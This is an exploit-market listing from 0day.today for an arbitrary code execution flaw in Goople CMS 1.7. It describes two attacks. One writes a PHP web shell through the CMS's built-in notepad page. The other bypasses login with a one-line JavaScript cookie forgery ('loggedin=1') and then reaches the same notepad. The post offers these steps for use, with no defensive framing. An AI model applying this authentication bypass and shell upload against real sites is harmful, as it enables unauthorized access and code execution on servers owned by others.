[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Goople Cms 1.7 Arbitrary Code Execution Vulnerability

Author
x0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4240
Category
web applications
Date add
24-11-2008
Platform
unsorted
=====================================================
Goople Cms 1.7 Arbitrary Code Execution Vulnerability
=====================================================


-============================================-
Autore: x0r - Evolution Team
Cms: Goople Cms 1.7
Bug: Arbitrary File Creation
Download:
http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
-============================================-

Exploit:

#Attack One

Logg yourself like a normal user then in your meno go on "Notepad" (
/win/notepad/index.php ), in this notepad you can make a php shell :P

#Attack Two

Use this js code for bypass the log in: javascript:document.cookie =
"loggedin=1; path=/"; <--- tnx BeyazKurt

And then go to /win/notepad/index.php


Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M....
Bimba Mia Sei La Mia Vita...



#  0day.today [2024-12-24]  #